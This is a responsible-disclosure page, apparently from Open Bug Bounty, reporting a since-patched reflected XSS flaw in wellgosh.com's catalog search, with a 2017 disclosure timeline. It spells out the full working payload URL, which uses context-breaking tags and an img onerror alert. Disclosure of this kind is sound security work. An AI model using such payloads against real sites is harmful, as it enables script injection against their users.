logo
DATABASE RESOURCES PRICING ABOUT US

wellgosh.com XSS vulnerability

Description

##### Vulnerable URL: https://wellgosh.com/catalogsearch/result/?q=%27}};%22%3E}%29;}%29;}%29]--%3E%3C/SCRIPT%3E-%3C/style%3E-%3C/title%3E-%3C/BoDy%3E-%3Cmarquee%3E-%3Ch1%3EOPENBUGBOUNTY%3C/h1%3E-%3C/marquee%3E-%3Cimg/src%3dx%20onerror%3dalert%28/OPENBUGBOUNTY/%29;%3E;{{%27 ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 174318 VIP website status:| No Check wellgosh.com SSL connection:| (Grade: A) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 6 February, 2017 23:46 GMT Generic security notifications sent to website owner| 6 February, 2017 23:49 GMT Notification sent to subscribers (without technical details)| 7 February, 2017 02:17 GMT Vulnerability details disclosed by researcher| 7 March, 2017 00:14 GMT Vulnerability patched by the website owner| 7 March, 2017 16:31 GMT